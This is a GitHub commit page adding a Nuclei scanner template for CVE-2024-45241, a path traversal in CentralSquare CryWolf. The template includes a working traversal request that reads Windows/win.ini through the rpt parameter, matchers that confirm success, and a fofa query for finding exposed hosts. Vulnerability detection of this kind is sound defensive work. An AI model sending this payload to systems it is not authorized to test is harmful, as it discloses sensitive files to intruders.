-
Notifications
You must be signed in to change notification settings - Fork 2.6k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #10609 from Kazgangap/CVE-2024-45241
add CVE-2024-45241
- Loading branch information
Showing
1 changed file
with
53 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
id: CVE-2024-45241 | ||
|
||
info: | ||
name: CentralSquare CryWolf - Path Traversal | ||
author: s4e-io | ||
severity: high | ||
description: | | ||
A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information. | ||
reference: | ||
- https://www.tenable.com/cve/CVE-2024-45241 | ||
- https://daly.wtf/cve-2024-45241-path-traversal-in-centralsquare-crywolf/ | ||
- https://github.com/d4lyw/CVE-2024-45241/ | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2024-45241 | ||
cpe: cpe:2.3:a:centralsquare:crywolf:2024-08-09:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
vendor: centralsquare | ||
product: crywolf | ||
fofa-query: "False Alarm Reduction Website" | ||
tags: cve,cve2024,lfi,centralsquare,crywolf | ||
|
||
flow: http(1) && http(2) | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains(body,"Powered by CryWolf")' | ||
- 'status_code == 200' | ||
condition: and | ||
internal: true | ||
|
||
- raw: | ||
- | | ||
GET /gdoc1.ashx HTTP/1.1 | ||
Host: {{Hostname}} | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'contains_all(body,"bit app support","fonts","extensions")' | ||
- 'contains(content_type,"application/pdf")' | ||
- 'status_code == 200' | ||
condition: and |